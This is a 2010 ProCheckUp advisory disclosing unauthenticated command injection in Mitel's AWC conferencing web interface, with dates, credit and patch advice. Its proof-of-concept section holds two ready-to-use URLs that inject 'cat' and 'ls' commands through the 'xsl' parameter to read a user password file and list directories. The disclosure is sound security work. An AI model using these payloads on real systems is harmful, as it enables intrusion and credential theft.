Mitel AWC Unauthenticated Command Execution

                                                http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14

PR10-14 Unauthenticated command execution within Mitel's AWC (Mitel
Audio and Web Conferencing)

Advisory publicly released: Tuesday, 21 December 2010
Vulnerability found: Wednesday, 21 July 2010
Vendor informed: Monday, 26 July 2010
Severity level: High/Critical
Credits
Jan Fry of ProCheckUp Ltd (www.procheckup.com)
Description
Mitel Audio and Web Conferencing (AWC) is a simple, cost-effective and
scalable audio and web conferencing solution supporting upto 200 ports.
http://www.mitel.com/DocController?documentId=26451
ProCheckUp has discovered that the AWC web user interface is vulnerable
to an unauthenticated command execution attack.
Proof of concept
The following demonstrate the command execution flaw:

1) Vulnerable to command execution

To read the user password file
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat
%20%22/usr/awc/www/users%22%26

To perform a directory listing
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%
20%22/usr/awc/www/cgi-bin/%22%26

Consequences:
Command execution allows Unix commands to be remotely executed with the
permissions associated with the web service account. No authentication
is required to exploit this vulnerability.
How to fix
Ensure that the latest patches have been installed.
References

Legal
Copyright 2010 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.